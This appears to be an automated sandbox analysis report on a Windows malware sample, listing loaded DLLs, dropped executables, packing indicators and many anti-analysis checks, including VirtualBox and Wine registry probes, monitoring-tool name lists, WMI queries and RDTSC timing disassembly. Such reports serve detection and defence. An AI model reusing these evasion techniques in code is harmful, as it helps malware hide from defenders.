Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: version.dll

Source: C:\Users\user\Desktop\CLaYpUL3zw.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\CLaYpUL3zw.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: CLaYpUL3zw.exe

Static file information: File size 7045120 > 1048576

Source: CLaYpUL3zw.exe	Static PE information: Raw size of is bigger than: 0x100000 < 0x518a00
Source: CLaYpUL3zw.exe	Static PE information: Raw size of uppnmxuj is bigger than: 0x100000 < 0x19a800

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\CLaYpUL3zw.exe

Unpacked PE file: 0.2.CLaYpUL3zw.exe.5d0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;uppnmxuj:EW;wnsrsfkt:EW;.taggant:EW; vs :ER;.rsrc:W;

Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe

Code function: 2_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,

2_2_00406328

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: CLaYpUL3zw.exe	Static PE information: real checksum: 0x6bb78f should be: 0x6bb0cb
Source: PasoCattle.exe.0.dr	Static PE information: real checksum: 0x102e74 should be: 0x10b21d

Source: CLaYpUL3zw.exe	Static PE information: section name:
Source: CLaYpUL3zw.exe	Static PE information: section name: .idata
Source: CLaYpUL3zw.exe	Static PE information: section name:
Source: CLaYpUL3zw.exe	Static PE information: section name: uppnmxuj
Source: CLaYpUL3zw.exe	Static PE information: section name: wnsrsfkt
Source: CLaYpUL3zw.exe	Static PE information: section name: .taggant
Source: Set-up.exe.0.dr	Static PE information: section name: .eh_fram

Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_00B4B630 push cs; retf	3_3_00B4B645
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_00B4B630 push cs; retf	3_3_00B4B645
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_00B4B630 push cs; retf	3_3_00B4B645
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_00B4B630 push cs; retf	3_3_00B4B645
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_00B4B630 push cs; retf	3_3_00B4B645
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_00B5494C push eax; iretd	3_3_00B5494D
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_00B5494C push eax; iretd	3_3_00B5494D
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_00B5494C push eax; iretd	3_3_00B5494D
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_00B5494C push eax; iretd	3_3_00B5494D
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_00B5494C push eax; iretd	3_3_00B5494D
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_00B5B4F8 pushfd ; iretd	3_3_00B5B4F9
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_00B5B4F8 pushfd ; iretd	3_3_00B5B4F9
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_00B5B4F8 pushfd ; iretd	3_3_00B5B4F9
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_00B5B4F8 pushfd ; iretd	3_3_00B5B4F9
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_00B4B630 push cs; retf	3_3_00B4B645
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_00B4B630 push cs; retf	3_3_00B4B645
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_00B4B630 push cs; retf	3_3_00B4B645
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_00B4B630 push cs; retf	3_3_00B4B645
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_00B4B630 push cs; retf	3_3_00B4B645
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_00B5494C push eax; iretd	3_3_00B5494D
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_00B5494C push eax; iretd	3_3_00B5494D
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_00B5494C push eax; iretd	3_3_00B5494D
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_00B5494C push eax; iretd	3_3_00B5494D
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_00B5494C push eax; iretd	3_3_00B5494D
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_00B5B4F8 pushfd ; iretd	3_3_00B5B4F9
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_00B5B4F8 pushfd ; iretd	3_3_00B5B4F9
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_00B5B4F8 pushfd ; iretd	3_3_00B5B4F9
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_00B5B4F8 pushfd ; iretd	3_3_00B5B4F9
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_00B4B630 push cs; retf	3_3_00B4B645
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_00B4B630 push cs; retf	3_3_00B4B645
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_00B4B630 push cs; retf	3_3_00B4B645

Source: CLaYpUL3zw.exe

Static PE information: section name: uppnmxuj entropy: 7.954185855265194

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Jump to dropped file

Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Jump to dropped file
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	File created: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Jump to dropped file
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	File created: C:\Users\user\AppData\Local\Temp\Set-up.exe	Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_005826DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		14_2_005826DD
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_0050FC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		14_2_0050FC7C

Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

System information queried: FirmwareTableInformation

Jump to behavior

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: CLaYpUL3zw.exe, 00000000.00000002.2262600590.0000000007674000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000003.00000002.2499350119.000000000112B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	Binary or memory string: PROCMON.EXE
Source: CLaYpUL3zw.exe, 00000000.00000002.2262600590.0000000007674000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000003.00000002.2499350119.000000000112B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	Binary or memory string: X64DBG.EXE
Source: CLaYpUL3zw.exe, CLaYpUL3zw.exe, 00000000.00000002.2251469203.00000000005D2000.00000040.00000001.01000000.00000003.sdmp, CLaYpUL3zw.exe, 00000000.00000003.2210580420.0000000005560000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL
Source: CLaYpUL3zw.exe, 00000000.00000002.2262600590.0000000007674000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000003.00000002.2499350119.000000000112B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	Binary or memory string: WINDBG.EXE
Source: Set-up.exe.0.dr	Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: CLaYpUL3zw.exe, 00000000.00000002.2262600590.0000000007674000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000003.00000002.2499350119.000000000112B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	Binary or memory string: WIRESHARK.EXE

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: D6A3BF second address: D6A3C4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: D6A3C4 second address: D69C79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 add dword ptr [ebp+122D33BDh], edx 0x0000000e push dword ptr [ebp+122D01A5h] 0x00000014 clc 0x00000015 call dword ptr [ebp+122D1DB5h] 0x0000001b pushad 0x0000001c mov dword ptr [ebp+122D379Ch], ecx 0x00000022 xor eax, eax 0x00000024 jmp 00007FA030F107B1h 0x00000029 mov edx, dword ptr [esp+28h] 0x0000002d clc 0x0000002e mov dword ptr [ebp+122D3970h], eax 0x00000034 pushad 0x00000035 mov eax, esi 0x00000037 mov esi, edx 0x00000039 popad 0x0000003a mov esi, 0000003Ch 0x0000003f jmp 00007FA030F107ABh 0x00000044 add esi, dword ptr [esp+24h] 0x00000048 or dword ptr [ebp+122D309Bh], edx 0x0000004e stc 0x0000004f lodsw 0x00000051 or dword ptr [ebp+122D37CFh], edx 0x00000057 add eax, dword ptr [esp+24h] 0x0000005b cld 0x0000005c mov ebx, dword ptr [esp+24h] 0x00000060 mov dword ptr [ebp+122D37CFh], edx 0x00000066 push eax 0x00000067 push edi 0x00000068 push eax 0x00000069 push edx 0x0000006a push eax 0x0000006b push edx 0x0000006c rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: D69C79 second address: D69C7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: ECD44F second address: ECD45C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push edi 0x00000009 pop edi 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: EDEFAE second address: EDEFE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push esi 0x00000007 pop esi 0x00000008 jmp 00007FA030CAD66Ch 0x0000000d popad 0x0000000e pushad 0x0000000f jnl 00007FA030CAD67Dh 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: EDF139 second address: EDF14E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007FA030F107A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push edx 0x00000013 pop edx 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: EDF2CE second address: EDF2F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA030CAD66Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a jl 00007FA030CAD677h 0x00000010 jmp 00007FA030CAD671h 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: EDF2F8 second address: EDF314 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA030F107B6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: EE285F second address: EE2864 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
